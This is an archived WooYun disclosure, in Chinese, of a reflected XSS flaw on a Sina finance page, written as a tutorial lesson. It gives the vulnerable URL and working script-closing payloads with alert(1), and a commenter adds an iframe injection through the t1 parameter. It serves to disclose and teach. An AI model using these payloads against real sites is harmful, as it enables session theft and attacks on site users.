当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-017521

漏洞标题:[新浪XSS一课一练]瘦子XSS教程第2课:输出在<script></script>之间

相关厂商:新浪

漏洞作者: 专注XSS三十年

提交时间:2013-01-19 10:42

修复时间:2013-03-05 10:43

公开时间:2013-03-05 10:43

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:1

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-01-19: 细节已通知厂商并且等待厂商处理中
2013-01-19: 厂商已经确认,细节仅向厂商公开
2013-01-29: 细节向核心白帽子及相关领域专家公开
2013-02-08: 细节向普通白帽子公开
2013-02-18: 细节向实习白帽子公开
2013-03-05: 细节向公众公开

简要描述:

第二课:http://www.wooyun.org/bugs/wooyun-2010-015959
唔。刚才找第一课的时候直接找到了这个,顺手发上来算了。反正开始都是很简单的
直接输出在源文件里,无任何过滤的反射型XSS

详细说明:

漏洞地址:

http://vip.stock.finance.sina.com.cn/q/go.php/vReport_List/kind/search/index.phtml?symbol=002698&orgname=&industry=&title=&t1=all


在title处随便写一串字符,然后查看源代码,以1111111111为例:

sina2.jpg


可以看到是直接输出在JS脚本之间的。加入</script>闭合前面的,测试通过,未作任何过滤:

http://vip.stock.finance.sina.com.cn/q/go.php/vReport_List/kind/search/index.phtml?symbol=002698&orgname=&industry=&title=111111111%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E&t1=all


漏洞证明:

http://vip.stock.finance.sina.com.cn/q/go.php/vReport_List/kind/search/index.phtml?symbol=002698&orgname=&industry=&title=111111111%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E&t1=all


该问题出现在多个子站页面,请全面检查。

修复方案:

U know.

版权声明:转载请注明来源 专注XSS三十年@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2013-01-19 18:28

厂商回复:


修复中。。。。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-01-19 11:49 | 小猪 ( 实习白帽子 | Rank:80 漏洞数:10 )

    坐等连载 沙发出售

  2. 2013-01-19 12:02 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    新浪Xss太多了 帐号体系在微博域内 一般影响太小了

  3. 2013-01-19 12:07 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:77 | coder)

    @xsser 对于满天的XSS带来的业务量增长,你是高兴还是忧愁啊?纠结吗?

  4. 2013-01-19 12:10 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @shine 某司说曾经一天内发现1000个xss 我们的安全还不足以对一般反射xss 重视到这程度

  5. 2013-01-19 12:51 | 专注XSS三十年 ( 实习白帽子 | Rank:39 漏洞数:11 | 11)

    @xsser 我有点不太明白.新浪微博不也是用的新浪通行证吗? 换句话说就是虽然COOKIE带到weibo.com下肯定不能用,但是有了COOKIE总归有办法获取密码或者改掉密码吧?不就也等于得到了微博帐号么.虽然实现起来肯定会绕很多远,但是程序一旦写好就可以一直使用了.我个人还是认为任何情况的通行证COOKIE泄漏都是一件很严重的事情

  6. 2013-01-19 12:55 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @专注XSS三十年 新浪与腾讯最大的不同,新浪的cookies有http-only,通过XSS无法获取到全部cookies数据,除非是同域XSS,否则影响甚微。

  7. 2013-01-19 12:57 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    好吧。你们赢了。。。

  8. 2013-01-19 12:58 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @专注XSS三十年 得深入分析 不能想当然

  9. 2013-01-19 13:00 | 专注XSS三十年 ( 实习白帽子 | Rank:39 漏洞数:11 | 11)

    @xsser 深入一个有RANK20没?

  10. 2013-01-19 13:06 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @专注XSS三十年 来一发看看

  11. 2013-01-19 13:29 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @xsser 深入会有高rank?

  12. 2013-01-19 18:57 | 心伤的瘦子 ( 普通白帽子 | Rank:147 漏洞数:21 | 严肃点~此号为虚拟小号,并不存在实体...)

    大家交作业,也交腾讯的就安逸啦!

  13. 2013-01-19 19:04 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @心伤的瘦子 交作业,大街网的如何、、、

  14. 2013-01-19 19:15 | 专注XSS三十年 ( 实习白帽子 | Rank:39 漏洞数:11 | 11)

    @心伤的瘦子 腾讯的我还想自己留着呐……腾讯权限大啊-A-

  15. 2013-01-28 12:24 | 专注XSS三十年 ( 实习白帽子 | Rank:39 漏洞数:11 | 11)

    @新浪 http://vip.stock.finance.sina.com.cn/q/go.php/vReport_List/kind/search/index.phtml?symbol=%3C/script%3E&orgname=%3C/script%3E&industry=%3C/script%3E&title=%3C/script%3E&t1=%3C/script%3E%3Ciframe%3E请继续修复…… 怎么其他都过滤了,反而t1没过滤。t1原本就是个根据数字判断类型的功能,直接parseInt不就完事了。

  16. 2013-02-17 14:19 | saber ( 路人 | Rank:8 漏洞数:2 | 我只是一个人走了太久,久到习惯了一个人。)

    貌似才开始~

  17. 2013-03-05 14:25 | 正在输入 ( 路人 | Rank:6 漏洞数:1 | 一直在磨蹭,一直在输入。。。。。。\0)

    我在baidu也遇到一个差不多的。不过,它把/ 变成\/ 没法闭合 好像